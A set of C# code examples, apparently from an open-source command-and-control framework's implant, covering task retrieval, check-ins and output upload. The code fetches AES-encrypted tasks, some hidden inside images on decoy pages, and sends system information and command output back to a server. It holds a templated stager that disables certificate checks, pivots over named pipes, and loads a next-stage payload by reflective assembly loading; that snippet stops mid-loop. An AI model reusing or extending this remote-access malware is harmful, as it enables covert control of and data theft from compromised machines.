示例#1
        /// <summary>
        /// Downloads a task document from <paramref name="rpaddress"/>, optionally
        /// extracts it from an image referenced by the downloaded page, decrypts it
        /// with AES and deserializes the resulting JSON into a <see cref="TaskMsg"/>.
        /// </summary>
        /// <param name="wc">Client used for the request; its credential and proxy settings are overwritten here.</param>
        /// <param name="aeskey">AES key handed to Crypto.Aes.DecryptAesMessage.</param>
        /// <param name="aesiv">AES IV handed to Crypto.Aes.DecryptAesMessage.</param>
        /// <param name="rpaddress">URL that is fetched.</param>
        /// <param name="targetclass">Forwarded to ImageLoader.Load when <paramref name="isCovered"/> is true.</param>
        /// <param name="isCovered">True when the downloaded body is an HTML page whose payload is carried inside an image rather than in the body itself.</param>
        /// <returns>The deserialized task; null when the body is empty or deserialization throws.
        /// Failures in base64 decoding or decryption happen outside the try block and propagate to the caller.</returns>
        public static TaskMsg GetTaskHttp(CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string targetclass, bool isCovered)
        {
            // The request is routed through the system default proxy and authenticates
            // to it with the process's default network credentials.
            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
            string resp = wc.DownloadString(rpaddress);

            if (!string.IsNullOrEmpty(resp))
            {
                if (isCovered)
                {
                    // Base URL is everything before the last '/'; ImageLoader.Load appends the image src to it.
                    string baseurl = rpaddress.Substring(0, rpaddress.LastIndexOf('/'));
                    // Encoding.Default is runtime dependent (the ANSI code page on .NET Framework).
                    resp = Encoding.Default.GetString(ImageLoader.ImageLoader.Load(baseurl, rpaddress, resp, wc, targetclass));
                }
                // Body is base64(AES ciphertext); decrypting yields the JSON text.
                var line = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);

                TaskMsg task = null;
                try
                {
                    task = new JavaScriptSerializer().Deserialize <TaskMsg>(line);
                    //task = JsonConvert.DeserializeObject<TaskMsg>(line);
                }
                catch (Exception)
                {
                    // Deserialization errors are swallowed; the caller only sees a null task.
                }

                return(task);
            }
            else
            {
                return(null);
            }
        }
示例#2
        //AES
        /// <summary>
        /// Wraps <paramref name="output"/> in a single (non-chunked) <see cref="ResponseMsg"/>,
        /// serializes it to JSON, AES-encrypts it and POSTs it to <paramref name="rpaddress"/>
        /// as a form field named <paramref name="param"/>.
        /// </summary>
        /// <param name="taskinstance">Copied into ResponseMsg.TaskInstanceid.</param>
        /// <param name="output">Message body; sent whole, no size check is performed here.</param>
        /// <param name="wc">Client used for the request; its credential and proxy settings are overwritten here.</param>
        /// <param name="aeskey">AES key handed to Crypto.Aes.EncryptAesMessage.</param>
        /// <param name="aesiv">AES IV handed to Crypto.Aes.EncryptAesMessage.</param>
        /// <param name="rpaddress">URL that receives the POST.</param>
        /// <param name="param">Form field name carrying the base64 ciphertext.</param>
        /// <param name="agentid">Copied into ResponseMsg.Agentid.</param>
        /// <param name="agentpivot">Optional; copied into ResponseMsg.AgentPivot only when non-null.</param>
        public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
        {
            // Always marked as a single message (Chunked = false, Number = 1).
            ResponseMsg respmsg = new ResponseMsg
            {
                TaskInstanceid = taskinstance,
                SystemInfo     = GetSystemInfo(),
                Chunked        = false,
                Agentid        = agentid,
                Number         = 1,
                Data           = output
            };

            if (agentpivot != null)
            {
                respmsg.AgentPivot = agentpivot;
            }


            string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
            //string respmsgjson = JsonConvert.SerializeObject(respmsg, Formatting.Indented);
            var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);

            // Form-encoded body "<param>=<base64 ciphertext>"; the value is not URL-escaped here.
            string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));

            // Routed through the system default proxy with the process's default network credentials.
            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

            // The server's reply is read but not used by this method.
            string resp = wc.UploadString(rpaddress, post);
        }
示例#3
        /// <summary>
        /// Locates the first image tag of class <paramref name="targetclass"/> in
        /// <paramref name="page"/>, fetches that image relative to <paramref name="baseurl"/>
        /// and returns the bytes GetPayloadFromImage extracts from it.
        /// </summary>
        /// <param name="baseurl">Prefix concatenated with the image's src attribute to form the request URL.</param>
        /// <param name="rpaddress">Sent as the Referer header of the image request.</param>
        /// <param name="page">HTML text searched for image tags.</param>
        /// <param name="wc">Client used to open the image stream.</param>
        /// <param name="targetclass">Class name handed to GetImagesInHTMLString to select image tags.</param>
        /// <returns>Payload bytes recovered from the image.</returns>
        /// <exception cref="InvalidOperationException">When no image tag matches (First() on an empty list).</exception>
        /// <exception cref="FormatException">When the tag's id attribute is not an integer.</exception>
        public static byte[] Load(string baseurl, string rpaddress, string page, CookiedWebClient wc, string targetclass)
        {
            // Only the first matching tag is considered.
            List <string> imagetags = GetImagesInHTMLString(page, targetclass);
            string        s         = imagetags.First();

            wc.Headers.Add(HttpRequestHeader.Referer, rpaddress);
            // Plain string concatenation: baseurl is expected to end where src begins.
            Stream imgstream = wc.OpenRead(baseurl + GetIdValue(s, "src"));

            // The tag's numeric id is passed through as the extraction parameter.
            return(GetPayloadFromImage(imgstream, Int32.Parse(GetIdValue(s, "id"))));
        }
示例#4
    public static void Execute()
    {
        string[] pageget =
        {
            #PAGEGET #
        };

        string[] pagepost =
        {
            #PAGEPOST #
        };

        string param     = "#PARAM#";
        string serverkey = "#SERVERKEY#";
        string host      = "#HOST#";

        string namedpipe = "#PIPENAME#";

        int port            = 0;
        int targetframework = 40;

        Int32.TryParse("#PORT#", out port);
        Int32.TryParse("#FRAMEWORK#", out targetframework);

        Thread.Sleep(10000);
        AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg();

        agentIdReqMsg.address   = host;
        agentIdReqMsg.port      = port;
        agentIdReqMsg.request   = "agentid";
        agentIdReqMsg.framework = targetframework;


        string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg);
        bool   agentexit = false;

        while (true && !agentexit)
        {
            try
            {
                string resp                = "";
                string cookievalue         = "";
                NamedPipeClientStream pipe = null;
                if (string.IsNullOrEmpty(namedpipe))
                {
                    CookiedWebClient wc = new CookiedWebClient();
                    wc.UseDefaultCredentials = true;
                    wc.Proxy             = WebRequest.DefaultWebProxy;
                    wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

                    WebHeaderCollection webHeaderCollection = new WebHeaderCollection();

                    webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");

                    #HEADERS #

                    wc.Headers = webHeaderCollection;

                    ServicePointManager.Expect100Continue      = true;
                    ServicePointManager.SecurityProtocol       = (SecurityProtocolType)3072;
                    ServicePointManager.DefaultConnectionLimit = 9999;
                    ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); });

                    string post      = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate));
                    string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post);

                    resp = wc.UploadString(rpaddress, post);

                    Cookie cookie = wc.ResponseCookies["sessionid"];
                    cookievalue = cookie.Value;
                }
                else
                {
                    try
                    {
                        pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous);
                        pipe.Connect(5000);
                        pipe.ReadMode = PipeTransmissionMode.Message;

                        //Write AgentIdReqMsg
                        var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate);
                        pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length);

                        var messageBytes = ReadMessage(pipe);
                        resp = Encoding.UTF8.GetString(messageBytes);
                    }
                    catch (Exception)
                    {
                    }
                }

                var        line       = DecryptMessage(serverkey, resp);
                AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line);

                object[] agrsstage = new object[] {
                    line, cookievalue, pipe
                };

                System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage));
                assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage);
            }
示例#5
        //AES
        /// <summary>
        /// Builds a <see cref="CheckInMsg"/> from the agent id and current system info,
        /// serializes it to JSON, AES-encrypts it and POSTs it to <paramref name="rpaddress"/>
        /// as a form field named <paramref name="param"/>.
        /// </summary>
        /// <param name="agentid">Copied into CheckInMsg.agentid.</param>
        /// <param name="aeskey">AES key used for both encrypting the request and decrypting the reply.</param>
        /// <param name="aesiv">AES IV used for both encrypting the request and decrypting the reply.</param>
        /// <param name="rpaddress">URL that receives the POST.</param>
        /// <param name="param">Form field name carrying the base64 ciphertext.</param>
        /// <param name="wc">Client used for the request; its credential and proxy settings are overwritten here.</param>
        public static void SendCheckinHttp(string agentid, byte[] aeskey, byte[] aesiv, string rpaddress, string param, CookiedWebClient wc)
        {
            //Collect system info
            SystemInfo sinfo = GetSystemInfo();
            CheckInMsg msg   = new CheckInMsg();

            msg.agentid    = agentid;
            msg.systeminfo = sinfo;

            string checkinmsg = new JavaScriptSerializer().Serialize(msg);
            //string checkinmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
            var checkinmsgenc = Crypto.Aes.EncryptAesMessage(checkinmsg, aeskey, aesiv);

            // Form-encoded body "<param>=<base64 ciphertext>"; the value is not URL-escaped here.
            string post = String.Format("{0}={1}", param, Convert.ToBase64String(checkinmsgenc));

            // Routed through the system default proxy with the process's default network credentials.
            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

            // The reply is base64-decoded and decrypted but the plaintext is not used by this method;
            // a reply that is not valid base64 or does not decrypt raises here.
            string resp     = wc.UploadString(rpaddress, post);
            string respjson = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);
        }
示例#6
        //AES
        /// <summary>
        /// Sends <paramref name="output"/> to <paramref name="rpaddress"/> as one or more
        /// AES-encrypted <see cref="ResponseMsg"/> POSTs. Output longer than 1,024,000
        /// UTF-16 code units is split into fixed-size chunks, each sent as its own
        /// message, followed by a terminating message with empty Data and Number = 0.
        /// </summary>
        /// <param name="taskinstance">Copied into ResponseMsg.TaskInstanceid.</param>
        /// <param name="output">Message body; split on output.Length (characters, not bytes).</param>
        /// <param name="wc">Client used for the requests; its credential and proxy settings are overwritten here.</param>
        /// <param name="aeskey">AES key handed to Crypto.Aes.EncryptAesMessage.</param>
        /// <param name="aesiv">AES IV handed to Crypto.Aes.EncryptAesMessage.</param>
        /// <param name="rpaddress">URL that receives every POST.</param>
        /// <param name="param">Form field name carrying the base64 ciphertext.</param>
        /// <param name="agentid">Copied into ResponseMsg.Agentid.</param>
        /// <param name="agentpivot">Declared for interface compatibility; not read in this overload.</param>
        public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
        {
            // Routed through the system default proxy with the process's default network credentials.
            wc.UseDefaultCredentials = true;
            wc.Proxy             = WebRequest.DefaultWebProxy;
            wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;

            // One message object is reused for every chunk; only Data changes per iteration.
            ResponseMsg respmsg = new ResponseMsg
            {
                TaskInstanceid = taskinstance,
                SystemInfo     = GetSystemInfo(),
                Chunked        = false,
                Agentid        = agentid,
                Number         = 1
            };

            // Chunk size in UTF-16 code units (output.Length), not in bytes.
            int chunksize = 1024000;

            //Response need to be splitted
            if (output.Length > chunksize)
            {
                respmsg.Chunked = true;
            }

            //Chunk number
            // Ceiling division: chunknum = ceil(output.Length / chunksize).
            int chunknum = output.Length / chunksize;

            if (output.Length % chunksize != 0)
            {
                chunknum++;
            }

            // Number carries the total chunk count on every chunk, not the chunk index.
            respmsg.Number = chunknum;

            int iter = 0;

            // do/while: at least one POST is made even when output is empty (chunknum == 0).
            do
            {
                // Last chunk may be shorter than chunksize.
                int remaining = output.Length - (iter * chunksize);
                if (remaining > chunksize)
                {
                    remaining = chunksize;
                }

                respmsg.Data = output.Substring(iter * chunksize, remaining);

                string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
                //string respmsgjson = JsonConvert.SerializeObject(respmsg, Formatting.Indented);
                var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);

                // Form-encoded body "<param>=<base64 ciphertext>"; the value is not URL-escaped here.
                string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));



                // Reply is read but not used; a failed upload throws and aborts the remaining chunks.
                string resp = wc.UploadString(rpaddress, post);

                iter++;
            }while (chunknum > iter);

            // Chunked transfers end with an empty message (Data = "", Number = 0) as an end marker.
            if (respmsg.Chunked)
            {
                respmsg.Data   = "";
                respmsg.Number = 0;

                string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
                var    response    = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);

                string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));
                string resp = wc.UploadString(rpaddress, post);
            }
        }